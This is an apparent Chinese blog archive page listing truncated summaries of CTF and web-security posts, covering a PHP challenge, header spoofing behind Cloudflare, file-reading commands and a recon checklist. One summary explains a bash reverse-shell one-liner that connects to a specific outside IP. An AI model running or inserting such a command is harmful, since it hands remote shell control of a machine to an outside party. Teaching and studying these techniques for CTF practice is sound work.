08 2022 档案
摘要:<?php highlight_file(__FILE__); include('flag.php'); $cs = file_get_contents('php://input'); class ctfshow{ public $username='xxxxxx'; public $passwor
阅读全文
摘要:index.php 看到该题目第一眼,大脑直接一个简单的想法就是通过访问flag.php添加X-Forwarded-For然后POST发送token数据。 但!在本题的环境当中,由于使用了Cloudflare代理导致,Cloudflare 会将 HTTP 代理的 IP 地址附加到这个标头,在两次调用
阅读全文
摘要:bash -i >& /dev/tcp/49.232.106.183/8080 0>&1 首先,bash -i是打开一个交互的bash,这个最简单。我们先跳过“>&”和“0>&1”,这两个是本文重点,等会再说。先来说“/dev/tcp/”。 /dev/tcp/是Linux中的一个特殊设备,打开这个文
阅读全文
摘要:一、查看文件内容 1.cat 2.nl 3.tac 4.rev 倒序输出 5.more:一页一页的显示档案内容 6.less:与 more 类似 head:查看头几行 7.tail:查看尾几行 8.od:以二进制的方式读取档案内容 9.vi:一种编辑器,这个也可以查看 10.vim:一种编辑器,这个
阅读全文
摘要:1.右键查看网页源代码或在url前加上view-source: ,代码审计能力。 2.抓包分析流量查看有无隐藏数据。 3.利用工具去扫描后台目录,查看是否有泄漏网页源代码的文件或者robots.txt文件或者敏感文件等,特别注意phpinfo()中有可能隐藏数据。 4.查看cookie有无隐藏数据。
阅读全文
